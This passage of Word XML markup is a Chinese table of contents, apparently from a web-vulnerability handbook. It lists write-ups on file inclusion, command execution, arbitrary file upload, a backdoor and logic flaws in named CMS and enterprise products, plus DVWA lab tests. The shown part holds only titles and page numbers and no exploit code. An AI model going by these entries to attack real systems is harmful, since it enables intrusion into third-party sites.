          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>读</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>写漏洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">............................................ </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 70 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="417" w:right="317" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>易酷</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-66"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">cms </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>本地包含</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>导</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>致</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-64"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>getwebshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">......................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 72 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>远程命令执行</w:t>
        </w:r>
        <w:r>
          <w:t xml:space="preserve">......................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 81 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>惠尔顿上网行为管理系统命令执行</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>...........................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 81 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>上海格尔安全认证网关管理系统命令执行</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:position w:val="1"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">......................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 85 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="99"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>文件上传漏洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">......................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 93 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="897" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark22" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>任意上</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>传漏洞原理</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:position w:val="1"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>..................................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:position w:val="1"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 95 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="164"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>《</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">DVWA </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>的分析与测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-63"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>7(File Upload</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>》</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">.................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 99 -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24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>中国联通客服平台任意文件上传</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>.............................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 104 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>用友</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-67"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">ICC </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>网站客服系统任意文件上传漏洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>...........................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">- </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>107 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1120" w:left="1380" w:header="0" w:footer="938" w:gutter="0"/>
          <w:pgNumType w:start="2"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="85"/>
        <w:ind w:left="417" w:right="317" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>泛微</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-60"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Eoffice </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>任意文件上</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>传</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">...................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 109 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>后门</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:position w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve">....................................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 113 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="314" w:lineRule="exact"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">EcShop </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>官方</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>补</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>丁存后</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>门</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>............................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 113 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark28" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>panabit</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>高危漏洞合集</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>...............................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 114 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>逻辑错误</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>.....................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">.......................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 117 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">Espcms </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>后台逻辑验证错误漏洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">............................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 117 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="657" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">cmseasy </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>逻辑缺陷可升级普通用户为管理员</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 121 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="417" w:right="317" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">PHPCMS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>设计缺陷可重置前台任意用户密码</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>.....................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">- </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>126 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="112"/>
        <w:ind w:right="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark32" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>密码相当</w:t>
        </w:r>
        <w:r>
          <w:t xml:space="preserve">............................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 131 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="424" w:firstLine="240"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark32" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Espcms </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>加密函数缺陷</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>导</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>致</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-93"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>getshe</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>ll</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">......................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 131 -</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_bookmark33" w:history="1">
        <w:r>
